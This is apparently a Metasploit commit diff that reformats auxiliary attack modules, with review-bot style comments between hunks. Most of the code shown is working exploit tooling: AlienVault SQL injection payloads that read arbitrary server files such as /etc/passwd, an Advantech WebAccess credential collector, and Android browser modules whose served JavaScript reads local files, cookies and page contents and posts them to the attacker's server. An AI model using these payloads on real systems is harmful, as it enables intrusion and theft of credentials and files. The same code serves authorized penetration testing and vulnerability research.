Runs Rubocop to fix layout in modules

This commit is contained in:
cgranleese-r7
2025-06-20 13:20:44 +01:00
parent 7208c10f37
commit a4b14d8b64
2320 changed files with 89510 additions and 89246 deletions
+3 -3
@@ -22,9 +22,9 @@ class MetasploitModule < Msf::Auxiliary
'Author' => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>' ],
'License' => MSF_LICENSE,
'Notes' => {
'Stability' => [CRASH_SAFE],
'SideEffects' => [IOC_IN_LOGS],
'Reliability' => []
'Stability' => [CRASH_SAFE],
'SideEffects' => [IOC_IN_LOGS],
'Reliability' => []
}
)
)
@@ -111,7 +111,7 @@ class MetasploitModule < Msf::Auxiliary
report_note(
:rhost => datastore['RHOSTS'],
:rport => datastore['RPORT'],
:type => "psexec_command",
:type => "psexec_command",
:name => datastore['COMMAND'],
:data => { :command_output => output }
)
+1 -1
@@ -89,7 +89,7 @@ class MetasploitModule < Msf::Auxiliary
# host: inst.private_ip_address,
# type: 'ec2.public_ips',
# data: { :eips => eips.join(' ') }
#) unless eips.empty?
# ) unless eips.empty?
if inst.public_ip_address && !inst.public_dns_name.empty?
report_note(
host: inst.private_ip_address,
@@ -84,10 +84,10 @@ class MetasploitModule < Msf::Auxiliary
print_status("Found Byte-Range Header DOS at #{uri}")
report_note(
:host => rhost,
:port => rport,
:type => 'apache.killer',
:data => { :uri => uri }
:host => rhost,
:port => rport,
:type => 'apache.killer',
:data => { :uri => uri }
)
else
+17 -16
@@ -7,27 +7,28 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info,
'Name' => 'BADPDF Malicious PDF Creator',
'Description' => '
super(
update_info(
info,
'Name' => 'BADPDF Malicious PDF Creator',
'Description' => %q{
This module can either creates a blank PDF file which contains a UNC link which can be used
to capture NetNTLM credentials, or if the PDFINJECT option is used it will inject the necessary
code into an existing PDF document if possible.
',
'License' => MSF_LICENSE,
'Author' =>
[
'Assaf Baharav', # Code provided as POC by CheckPoint
'Yaron Fruchtmann', # Code provided as POC by CheckPoint
'Ido Solomon', # Code provided as POC by CheckPoint
'Richard Davy - secureyourit.co.uk', # Metasploit
],
'Platform' => ['win'],
'References' =>
[
},
'License' => MSF_LICENSE,
'Author' => [
'Assaf Baharav', # Code provided as POC by CheckPoint
'Yaron Fruchtmann', # Code provided as POC by CheckPoint
'Ido Solomon', # Code provided as POC by CheckPoint
'Richard Davy - secureyourit.co.uk', # Metasploit
],
'Platform' => ['win'],
'References' => [
['CVE', '2018-4993'],
['URL', 'https://research.checkpoint.com/ntlm-credentials-theft-via-pdf-files/']
])
]
)
)
register_options(
[
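Review bot: The rebuilt update_info hash still has no 'Notes' entry (Stability/SideEffects/Reliability), which the psexec module earlier in this commit declares and which the other modules in this chunk (Advantech WebAccess, both AlienVault modules, the Android modules, Apache Rave and the Safari module) also lack; a layout pass is a cheap moment to add `'Notes' => { 'Stability' => [...], 'SideEffects' => [...], 'Reliability' => [...] }` after 'References', with the values chosen per module rather than copied. The Description also keeps the grammar slip "can either creates": `This module can either create a blank PDF file which contains a UNC link ...`. initialize continues past the hunk into register_options.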
@@ -6,35 +6,37 @@
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => "Advantech WebAccess 8.1 Post Authentication Credential Collector",
'Description' => %q{
This module allows you to log into Advantech WebAccess 8.1, and collect all of the credentials.
Although authentication is required, any level of user permission can exploit this vulnerability.
def initialize(info = {})
super(
update_info(
info,
'Name' => "Advantech WebAccess 8.1 Post Authentication Credential Collector",
'Description' => %q{
This module allows you to log into Advantech WebAccess 8.1, and collect all of the credentials.
Although authentication is required, any level of user permission can exploit this vulnerability.
Note that 8.2 is not suitable for this.
},
'License' => MSF_LICENSE,
'Author' =>
[
Note that 8.2 is not suitable for this.
},
'License' => MSF_LICENSE,
'Author' => [
'h00die', # Pointed out the obvious during a PR review for CVE-2017-5154
'sinn3r', # Metasploit module
],
'References' =>
[
'References' => [
['CVE', '2016-5810'],
['URL', 'https://github.com/rapid7/metasploit-framework/pull/7859#issuecomment-274305229']
],
'DisclosureDate' => '2017-01-21'
))
'DisclosureDate' => '2017-01-21'
)
)
register_options(
[
OptString.new('WEBACCESSUSER', [true, 'Username for Advantech WebAccess', 'admin']),
OptString.new('WEBACCESSPASS', [false, 'Password for Advantech WebAccess', '']),
OptString.new('TARGETURI', [true, 'The base path to Advantech WebAccess', '/']),
])
]
)
end
def do_login
@@ -43,15 +45,15 @@ class MetasploitModule < Msf::Auxiliary
uri = normalize_uri(target_uri.path, 'broadweb', 'user', 'signin.asp')
res = send_request_cgi({
'method' => 'POST',
'uri' => uri,
'method' => 'POST',
'uri' => uri,
'vars_post' => {
'page' => '/',
'pos' => '',
'pos' => '',
'username' => datastore['WEBACCESSUSER'],
'password' => datastore['WEBACCESSPASS'],
'remMe' => '',
'submit1' => 'Login'
'remMe' => '',
'submit1' => 'Login'
}
})
@@ -77,11 +79,11 @@ class MetasploitModule < Msf::Auxiliary
def get_user_cred_detail(sid, user)
vprint_status("Gathering password for user: #{user}")
uri = normalize_uri(target_uri.path, 'broadWeb','user', 'upAdminPg.asp')
uri = normalize_uri(target_uri.path, 'broadWeb', 'user', 'upAdminPg.asp')
res = send_request_cgi({
'method' => 'GET',
'uri' => uri,
'uri' => uri,
'cookie' => sid,
'vars_get' => {
'uname' => user
@@ -106,7 +108,7 @@ class MetasploitModule < Msf::Auxiliary
res = send_request_cgi({
'method' => 'GET',
'uri' => uri,
'uri' => uri,
'cookie' => sid
})
@@ -6,45 +6,45 @@
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => "AlienVault Authenticated SQL Injection Arbitrary File Read",
'Description' => %q{
AlienVault 4.5.0 is susceptible to an authenticated SQL injection attack via a PNG
generation PHP file. This module exploits this to read an arbitrary file from
the file system. Any authenticated user is able to exploit it, as administrator
privileges aren't required.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Brandon Perry <bperry.volatile[at]gmail.com>' #meatpistol module
def initialize(info = {})
super(
update_info(
info,
'Name' => "AlienVault Authenticated SQL Injection Arbitrary File Read",
'Description' => %q{
AlienVault 4.5.0 is susceptible to an authenticated SQL injection attack via a PNG
generation PHP file. This module exploits this to read an arbitrary file from
the file system. Any authenticated user is able to exploit it, as administrator
privileges aren't required.
},
'License' => MSF_LICENSE,
'Author' => [
'Brandon Perry <bperry.volatile[at]gmail.com>' # meatpistol module
],
'References' =>
[
'References' => [
['EDB', '32644']
],
'DefaultOptions' =>
{
'DefaultOptions' => {
'SSL' => true
},
'Platform' => ['linux'],
'Privileged' => false,
'DisclosureDate' => '2014-03-30'))
'Platform' => ['linux'],
'Privileged' => false,
'DisclosureDate' => '2014-03-30'
)
)
register_options(
register_options(
[
Opt::RPORT(443),
OptString.new('FILEPATH', [ true, 'Path to remote file', '/etc/passwd' ]),
OptString.new('USERNAME', [ true, 'Single username' ]),
OptString.new('PASSWORD', [ true, 'Single password' ]),
OptString.new('TARGETURI', [ true, 'Relative URI of installation', '/' ])
])
]
)
end
def run
print_status("Get a valid session cookie...")
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'ossim', 'session', 'login.php')
@@ -113,7 +113,7 @@ class MetasploitModule < Msf::Auxiliary
full << str
vprint_status(str)
i = i+1
i = i + 1
end
path = store_loot('alienvault.file', 'text/plain', datastore['RHOST'], full, datastore['FILEPATH'])
@@ -121,9 +121,9 @@ class MetasploitModule < Msf::Auxiliary
end
def sqli(left_marker, right_marker, i, cookie, filename)
pay = "2014-02-28' AND (SELECT 1170 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]},"
pay = "2014-02-28' AND (SELECT 1170 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]},"
pay << "(SELECT MID((IFNULL(CAST(HEX(LOAD_FILE(0x#(unknown))) AS CHAR),"
pay << "0x20)),#{(50*i)+1},50)),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS"
pay << "0x20)),#{(50 * i) + 1},50)),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS"
pay << " GROUP BY x)a) AND 'xnDa'='xnDa"
get = {
@@ -145,4 +145,3 @@ class MetasploitModule < Msf::Auxiliary
end
end
end
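Review bot: In sqli the hex encoding of the markers is spelled `left_marker.unpack("H*")[0]` (and likewise for right_marker) on the lines re-spaced here; `left_marker.unpack1('H*')` is the direct form and avoids building a one-element array only to index it. The same pattern appears in the 4.6.1 module's sqli further down, where sql_true is encoded twice on a single line and could be hoisted into a local such as `sql_true_hex = sql_true.unpack1('H*')`. sqli's body continues outside the hunk in both modules.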
@@ -6,46 +6,46 @@
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => "AlienVault Authenticated SQL Injection Arbitrary File Read",
'Description' => %q{
AlienVault 4.6.1 and below is susceptible to an authenticated SQL injection attack against
newpolicyform.php, using the 'insertinto' parameter. This module exploits the vulnerability
to read an arbitrary file from the file system. Any authenticated user is able to exploit
this, as administrator privileges are not required.
},
'License' => MSF_LICENSE,
'Author' =>
[
def initialize(info = {})
super(
update_info(
info,
'Name' => "AlienVault Authenticated SQL Injection Arbitrary File Read",
'Description' => %q{
AlienVault 4.6.1 and below is susceptible to an authenticated SQL injection attack against
newpolicyform.php, using the 'insertinto' parameter. This module exploits the vulnerability
to read an arbitrary file from the file system. Any authenticated user is able to exploit
this, as administrator privileges are not required.
},
'License' => MSF_LICENSE,
'Author' => [
'Chris Hebert <chrisdhebert[at]gmail.com>'
],
'References' =>
[
'References' => [
['CVE', '2014-5383'],
['OSVDB', '106815'],
['EDB', '33317'],
['URL', 'http://forums.alienvault.com/discussion/2690/security-advisories-v4-6-1-and-lower']
],
'DefaultOptions' =>
{
'DefaultOptions' => {
'SSL' => true
},
'Privileged' => false,
'DisclosureDate' => '2014-05-09'))
'Privileged' => false,
'DisclosureDate' => '2014-05-09'
)
)
register_options([
Opt::RPORT(443),
OptString.new('FILEPATH', [ true, 'Path to remote file', '/etc/passwd' ]),
OptString.new('USERNAME', [ true, 'Single username' ]),
OptString.new('PASSWORD', [ true, 'Single password' ]),
OptString.new('TARGETURI', [ true, 'Relative URI of installation', '/' ]),
OptInt.new('SQLI_TIMEOUT', [ true, 'Specify the maximum time to exploit the sqli (in seconds)', 60])
])
register_options([
Opt::RPORT(443),
OptString.new('FILEPATH', [ true, 'Path to remote file', '/etc/passwd' ]),
OptString.new('USERNAME', [ true, 'Single username' ]),
OptString.new('PASSWORD', [ true, 'Single password' ]),
OptString.new('TARGETURI', [ true, 'Relative URI of installation', '/' ]),
OptInt.new('SQLI_TIMEOUT', [ true, 'Specify the maximum time to exploit the sqli (in seconds)', 60])
])
end
def run
print_status("Get a valid session cookie...")
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'ossim', 'session', 'login.php')
@@ -117,7 +117,7 @@ class MetasploitModule < Msf::Auxiliary
full << str
vprint_status(str)
i = i+1
i = i + 1
end
end
rescue ::Timeout::Error
@@ -134,9 +134,9 @@ class MetasploitModule < Msf::Auxiliary
end
def sqli(left_marker, right_marker, sql_true, i, cookie, filename)
pay = "X') AND (SELECT 1170 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]},"
pay = "X') AND (SELECT 1170 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]},"
pay << "(SELECT MID((IFNULL(CAST(HEX(LOAD_FILE(0x#(unknown))) AS CHAR),"
pay << "0x20)),#{(50*i)+1},50)),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS"
pay << "0x20)),#{(50 * i) + 1},50)),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS"
pay << " GROUP BY x)a) AND ('0x#{sql_true.unpack("H*")[0]}'='0x#{sql_true.unpack("H*")[0]}"
get = {
@@ -3,36 +3,37 @@
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Auxiliary::Report
include Msf::Exploit::JSObfu
def initialize(info={})
super(update_info(info,
'Name' => 'Android Browser File Theft',
'Description' => %q{
This module steals the cookie, password, and autofill databases from the
Browser application on AOSP 4.3 and below.
},
'Author' => [
'Rafay Baloch', # Found UXSS bug in Android Browser
'joev' # File redirect and msf module
],
'License' => MSF_LICENSE,
'Actions' => [[ 'WebServer', 'Description' => 'Serve exploit via web server' ]],
'PassiveActions' => [ 'WebServer' ],
'References' =>
[
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Android Browser File Theft',
'Description' => %q{
This module steals the cookie, password, and autofill databases from the
Browser application on AOSP 4.3 and below.
},
'Author' => [
'Rafay Baloch', # Found UXSS bug in Android Browser
'joev' # File redirect and msf module
],
'License' => MSF_LICENSE,
'Actions' => [[ 'WebServer', 'Description' => 'Serve exploit via web server' ]],
'PassiveActions' => [ 'WebServer' ],
'References' => [
# patch for file redirection, 2014
['URL', 'https://android.googlesource.com/platform/packages/apps/Browser/+/d2391b492dec778452238bc6d9d549d56d41c107%5E%21/#F0'],
['URL', 'https://bugs.chromium.org/p/chromium/issues/detail?id=90222'] # the UXSS
],
'DefaultAction' => 'WebServer'
))
'DefaultAction' => 'WebServer'
)
)
register_options([
register_options([
OptString.new('ADDITIONAL_FILES', [
false,
'Comma-separated list of addition file URLs to steal.',
@@ -63,7 +64,7 @@ class MetasploitModule < Msf::Auxiliary
data = JSON.parse(request.body)
contents = hex2bin(data['data'])
file = File.basename(data['url'])
print_good("File received: #{(contents.bytesize.to_f/1000).round(2)}kb #{file}")
print_good("File received: #{(contents.bytesize.to_f / 1000).round(2)}kb #{file}")
loot_path = store_loot(
file,
'application/x-sqlite3',
@@ -75,7 +76,6 @@ class MetasploitModule < Msf::Auxiliary
print_good("Saved to: #{loot_path}")
end
def file_urls
default_urls = [
'file:///data/data/com.android.browser/databases/webviewCookiesChromium.db',
@@ -91,7 +91,7 @@ class MetasploitModule < Msf::Auxiliary
default_urls = []
end
default_urls + (datastore['ADDITIONAL_FILES']||'').split(',')
default_urls + (datastore['ADDITIONAL_FILES'] || '').split(',')
end
def exploit_html
@@ -140,7 +140,7 @@ class MetasploitModule < Msf::Auxiliary
return (c.length < 2) ? 0+c : c;
}).join(new String);
/*ensures there are no 'not allowed' responses that appear to be valid data*/
if (hex.length && hex.indexOf('#{Rex::Text.to_hex("<html><body>not allowed</body></html>","")}') === -1) {
if (hex.length && hex.indexOf('#{Rex::Text.to_hex("<html><body>not allowed</body></html>", "")}') === -1) {
top.postMessage({data:hex,url:location.href}, '*');
}
parent.postMessage(1,'*');
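Review bot: The handler at the top of the `@@ -63,7 +64,7 @@` hunk parses the POSTed body with `JSON.parse(request.body)` and then indexes `data['data']` and `data['url']` with no check that parsing succeeded or that the result is a Hash carrying those keys, so a malformed or unexpected body raises JSON::ParserError or NoMethodError inside the request handler instead of being logged and dropped (whether the HttpServer mixin rescues that for you is not visible here). The method begins outside the hunk; assuming it is a plain handler method like process_post in the sibling module, I would guard the parse before the hex2bin/basename lines:
```ruby
begin
  data = JSON.parse(request.body)
rescue JSON::ParserError => e
  print_error("Ignoring POST with malformed JSON body: #{e.message}")
  return
end
unless data.is_a?(Hash) && data['data'].is_a?(String) && data['url'].is_a?(String)
  print_error('Ignoring POST without string "data" and "url" fields')
  return
end
contents = hex2bin(data['data'])
# … unchanged: basename, print_good, store_loot …
```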
@@ -3,41 +3,42 @@
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Auxiliary::Report
include Msf::Exploit::JSObfu
def initialize(info={})
super(update_info(info,
'Name' => 'Android Browser "Open in New Tab" Cookie Theft',
'Description' => %q{
In Android's stock AOSP Browser application and WebView component, the
"open in new tab" functionality allows a file URL to be opened. On
versions of Android before 4.4, the path to the sqlite cookie
database could be specified. By saving a cookie containing a <script>
tag and then loading the sqlite database into the browser as an HTML file,
XSS can be achieved inside the cookie file, disclosing *all* cookies
(HttpOnly or not) to an attacker.
},
'Author' => [
'Rafay Baloch', # Discovery of "Open in new tab" bug
'joev' # Cookie theft vector, msf module
],
'License' => MSF_LICENSE,
'Actions' => [[ 'WebServer', 'Description' => 'Serve exploit via web server' ]],
'PassiveActions' => [ 'WebServer' ],
'References' =>
[
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Android Browser "Open in New Tab" Cookie Theft',
'Description' => %q{
In Android's stock AOSP Browser application and WebView component, the
"open in new tab" functionality allows a file URL to be opened. On
versions of Android before 4.4, the path to the sqlite cookie
database could be specified. By saving a cookie containing a <script>
tag and then loading the sqlite database into the browser as an HTML file,
XSS can be achieved inside the cookie file, disclosing *all* cookies
(HttpOnly or not) to an attacker.
},
'Author' => [
'Rafay Baloch', # Discovery of "Open in new tab" bug
'joev' # Cookie theft vector, msf module
],
'License' => MSF_LICENSE,
'Actions' => [[ 'WebServer', 'Description' => 'Serve exploit via web server' ]],
'PassiveActions' => [ 'WebServer' ],
'References' => [
# the patch, released against 4.3 AOSP in February 2014
['URL', 'https://android.googlesource.com/platform/packages/apps/Browser/+/d2391b492dec778452238bc6d9d549d56d41c107%5E%21/#F0'],
['URL', 'http://www.rafayhackingarticles.net/2014/12/android-browser-cross-scheme-data.html']
],
'DefaultAction' => 'WebServer'
))
'DefaultAction' => 'WebServer'
)
)
register_options([
register_options([
OptString.new('COOKIE_FILE', [
true,
'The cookie file (on older 2.x devices this is "webview.db")',
@@ -62,7 +63,7 @@ class MetasploitModule < Msf::Auxiliary
def process_post(cli, request)
data = hex2bin(request.body)
print_good "Cookies received: #{request.body.length.to_f/1024}kb"
print_good "Cookies received: #{request.body.length.to_f / 1024}kb"
loot_path = store_loot(
"android.browser.cookies",
'application/x-sqlite3',
@@ -124,7 +125,7 @@ class MetasploitModule < Msf::Auxiliary
|
end
def cookie_path(file='')
def cookie_path(file = '')
'/data/data/com.android.browser/databases/' + file
end
@@ -134,6 +135,6 @@ class MetasploitModule < Msf::Auxiliary
end
def per_run_token
@token ||= Rex::Text.rand_text_alpha(rand(2)+1)
@token ||= Rex::Text.rand_text_alpha(rand(2) + 1)
end
end
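Review bot: process_post reports `request.body.length.to_f / 1024` as the received size, but the body is the hex-encoded form that the line above decodes with hex2bin, so (if hex2bin is a plain hex decode) the printed figure is twice the cookie database's size and is shown unrounded; the file-theft module in this commit measures the decoded contents and rounds. `print_good "Cookies received: #{(data.bytesize.to_f / 1024).round(2)}kb"` brings the two in line. process_post continues past the hunk.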
@@ -8,38 +8,41 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'Android Content Provider File Disclosure',
'Description' => %q{
super(
update_info(
info,
'Name' => 'Android Content Provider File Disclosure',
'Description' => %q{
This module exploits a cross-domain issue within the Android web browser to
exfiltrate files from a vulnerable device.
},
'Author' =>
[
'Thomas Cannon', # Original discovery, partial disclsoure
'jduck' # Metasploit module
exfiltrate files from a vulnerable device.
},
'Author' => [
'Thomas Cannon', # Original discovery, partial disclsoure
'jduck' # Metasploit module
],
'License' => MSF_LICENSE,
'Actions' =>
[
'License' => MSF_LICENSE,
'Actions' => [
[ 'WebServer' ]
],
'PassiveActions' =>
[
'PassiveActions' => [
'WebServer'
],
'References' =>
[
'References' => [
[ 'CVE', '2010-4804' ],
[ 'URL', 'http://thomascannon.net/blog/2010/11/android-data-stealing-vulnerability/' ]
],
'DefaultAction' => 'WebServer'))
'DefaultAction' => 'WebServer'
)
)
register_options(
[
OptString.new('FILES', [ false, "The remote file(s) to steal",
'/proc/version,/proc/self/status,/data/system/packages.list' ])
])
OptString.new('FILES', [
false, "The remote file(s) to steal",
'/proc/version,/proc/self/status,/data/system/packages.list'
])
]
)
end
def on_request_uri(cli, request)
@@ -47,6 +50,7 @@ class MetasploitModule < Msf::Auxiliary
selected_headers = [ 'user-agent', 'origin', 'referer' ]
request.headers.each_key { |k|
next if not selected_headers.include? k.downcase
print_status("#{k}: #{request.headers[k]}")
}
@@ -55,77 +59,76 @@ class MetasploitModule < Msf::Auxiliary
# Only GET requests now..
if request.uri =~ /\.html?$/
filename = request.uri.split('/').last
target_files = datastore['FILES'].split(',').map{ |e|
target_files = datastore['FILES'].split(',').map { |e|
"'%s'" % e
}.join(',')
upload_url = get_uri(cli)
upload_url << '/' if upload_url[-1,1] != '/'
upload_url << '/' if upload_url[-1, 1] != '/'
upload_url << 'q'
html = <<-EOS
<html>
<body>
<script lang=javascript>
var target_files = Array(#{target_files});
var results = new Array();
function addField(form, name, value) {
var hf = document.createElement('input');
hf.setAttribute('type', 'hidden');
hf.setAttribute('name', name);
hf.setAttribute('value', value);
form.appendChild(hf);
}
function uploadFiles(files) {
var form = document.createElement('form');
form.setAttribute('method', 'POST');
form.setAttribute('action', '#{upload_url}');
var i = 0;
for (var fn in files) {
addField(form, 'f'+i, btoa(fn));
addField(form, 'd'+i, files[fn]);
i += 1;
}
document.body.appendChild(form);
form.submit();
}
for (var fn in target_files) {
fn = target_files[fn];
xh = new XMLHttpRequest();
xh.open('GET', fn, false);
xh.onreadystatechange = function() { if (xh.readyState == 4) { results[fn] = btoa(xh.responseText); } }
xh.send();
}
uploadFiles(results);
</script>
</body>
</html>
EOS
html = <<~EOS
<html>
<body>
<script lang=javascript>
var target_files = Array(#{target_files});
var results = new Array();
function addField(form, name, value) {
var hf = document.createElement('input');
hf.setAttribute('type', 'hidden');
hf.setAttribute('name', name);
hf.setAttribute('value', value);
form.appendChild(hf);
}
function uploadFiles(files) {
var form = document.createElement('form');
form.setAttribute('method', 'POST');
form.setAttribute('action', '#{upload_url}');
var i = 0;
for (var fn in files) {
addField(form, 'f'+i, btoa(fn));
addField(form, 'd'+i, files[fn]);
i += 1;
}
document.body.appendChild(form);
form.submit();
}
for (var fn in target_files) {
fn = target_files[fn];
xh = new XMLHttpRequest();
xh.open('GET', fn, false);
xh.onreadystatechange = function() { if (xh.readyState == 4) { results[fn] = btoa(xh.responseText); } }
xh.send();
}
uploadFiles(results);
</script>
</body>
</html>
EOS
print_status("Sending payload HTML ...")
send_response_html(cli, html,
{
'Cache-Control' => 'public',
'Content-Description' => 'File Transfer',
'Content-Disposition' => "attachment; filename=#(unknown)",
'Content-Transfer-Encoding' => 'binary',
'Content-Type' => 'text/html'
})
{
'Cache-Control' => 'public',
'Content-Description' => 'File Transfer',
'Content-Disposition' => "attachment; filename=#(unknown)",
'Content-Transfer-Encoding' => 'binary',
'Content-Type' => 'text/html'
})
else
payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))
payload_fn = Rex::Text.rand_text_alphanumeric(4 + rand(8))
html = <<-EOS
<html>
<body>
<script lang=javascript>
setTimeout("document.location = 'content://com.android.htmlfileprovider/sdcard/download/#{payload_fn}.html';", 5000);
setTimeout("document.location = '#{payload_fn}.html';", 500);
</script>
</body>
</html>
EOS
html = <<~EOS
<html>
<body>
<script lang=javascript>
setTimeout("document.location = 'content://com.android.htmlfileprovider/sdcard/download/#{payload_fn}.html';", 5000);
setTimeout("document.location = '#{payload_fn}.html';", 500);
</script>
</body>
</html>
EOS
print_status("Sending initial HTML ...")
send_response_html(cli, html)
@@ -134,7 +137,6 @@ EOS
end
def process_post(cli, request)
results = {}
if request and request.body
@@ -143,9 +145,9 @@ EOS
if parts.length != 2
print_error("Weird, we got a var that doesn't contain an equals: #{parts.inspect}")
else
fln,fld = parts
fln, fld = parts
fld = Rex::Text.uri_decode(fld).unpack('m').first
start = fln.slice!(0,1)
start = fln.slice!(0, 1)
if start == "f"
results[fln] ||= {}
results[fln][:filename] = fld
@@ -165,7 +167,7 @@ EOS
fn.gsub!(/[\/\\]/, '.')
fn.gsub!(/^\./, '')
store_loot('android.fs.'+fn, 'application/octet-stream', cli.peerhost, data, fn)
store_loot('android.fs.' + fn, 'application/octet-stream', cli.peerhost, data, fn)
}
send_response_html(cli, "thx")
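Review bot: Switching both heredocs in on_request_uri from `<<-EOS` to `<<~EOS` is not layout-neutral: `<<~` strips the common leading indentation from the body, so the HTML sent to the device differs from what was served before (harmless for markup and script, but any spec that pins the response body byte-for-byte will need updating, and the difference is invisible here because the rendered diff has lost indentation). The interpolated parts, `#{target_files}`, `#{upload_url}` and `#{payload_fn}`, are unaffected, so the change is fine to keep but deserves a line in the commit message. Separately, `if request and request.body` in process_post should read `if request && request.body`; `and` is the control-flow form, not the boolean operator. on_request_uri and process_post both extend beyond their hunks.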
@@ -9,37 +9,40 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',
'Description' => %q{
This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in
all versions of Android's open source stock browser before 4.4, and Android apps running
on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug
to scrape both cookie data and page contents from a vulnerable browser window.
super(
update_info(
info,
'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',
'Description' => %q{
This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in
all versions of Android's open source stock browser before 4.4, and Android apps running
on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug
to scrape both cookie data and page contents from a vulnerable browser window.
Target URLs that use X-Frame-Options can not be exploited with this vulnerability.
Target URLs that use X-Frame-Options can not be exploited with this vulnerability.
Some sample UXSS scripts are provided in data/exploits/uxss.
},
'Author' => [
'Rafay Baloch', # Original discovery, disclosure
'joev' # Metasploit module
],
'License' => MSF_LICENSE,
'Actions' => [
[ 'WebServer' ]
],
'PassiveActions' => [
'WebServer'
],
'References' => [
[ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],
[ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],
[ 'URL', 'http://trac.webkit.org/changeset/96826/webkit' ]
],
'DefaultAction' => 'WebServer',
'DisclosureDate' => '2014-10-04'
))
Some sample UXSS scripts are provided in data/exploits/uxss.
},
'Author' => [
'Rafay Baloch', # Original discovery, disclosure
'joev' # Metasploit module
],
'License' => MSF_LICENSE,
'Actions' => [
[ 'WebServer' ]
],
'PassiveActions' => [
'WebServer'
],
'References' => [
[ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],
[ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],
[ 'URL', 'http://trac.webkit.org/changeset/96826/webkit' ]
],
'DefaultAction' => 'WebServer',
'DisclosureDate' => '2014-10-04'
)
)
register_options([
OptString.new('TARGET_URLS', [
@@ -67,7 +70,7 @@ class MetasploitModule < Msf::Auxiliary
collect_data(request)
send_response_html(cli, '')
else
payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))
payload_fn = Rex::Text.rand_text_alphanumeric(4 + rand(8))
domains = datastore['TARGET_URLS'].split(',')
script = js_obfuscate <<-EOS
@@ -81,7 +84,7 @@ class MetasploitModule < Msf::Auxiliary
'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+
'TML,i:'+(i||0)+'}),"*");eval(atob("#{Rex::Text.encode_base64(custom_js)}"'+
'));}void(0);';
obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';
obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12) + 5)}';
};
document.body.appendChild(obj);
});
@@ -8,40 +8,43 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',
'Description' => %q{
This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in
all versions of Android's open source stock browser before 4.4, and Android apps running
on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug
to scrape both cookie data and page contents from a vulnerable browser window.
super(
update_info(
info,
'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',
'Description' => %q{
This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in
all versions of Android's open source stock browser before 4.4, and Android apps running
on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug
to scrape both cookie data and page contents from a vulnerable browser window.
If your target URLs use X-Frame-Options, you can enable the "BYPASS_XFO" option,
which will cause a popup window to be used. This requires a click from the user
and is much less stealthy, but is generally harmless-looking.
If your target URLs use X-Frame-Options, you can enable the "BYPASS_XFO" option,
which will cause a popup window to be used. This requires a click from the user
and is much less stealthy, but is generally harmless-looking.
By supplying a CUSTOM_JS parameter and ensuring CLOSE_POPUP is set to false, this
module also allows running arbitrary javascript in the context of the targeted URL.
Some sample UXSS scripts are provided in data/exploits/uxss.
},
'Author' => [
'Rafay Baloch', # Original discovery, disclosure
'joev' # Metasploit module
],
'License' => MSF_LICENSE,
'Actions' => [
[ 'WebServer' ]
],
'PassiveActions' => [
'WebServer'
],
'References' => [
[ 'URL', 'http://1337day.com/exploit/description/22581' ],
[ 'OSVDB', '110664' ],
[ 'CVE', '2014-6041' ]
],
'DefaultAction' => 'WebServer'
))
By supplying a CUSTOM_JS parameter and ensuring CLOSE_POPUP is set to false, this
module also allows running arbitrary javascript in the context of the targeted URL.
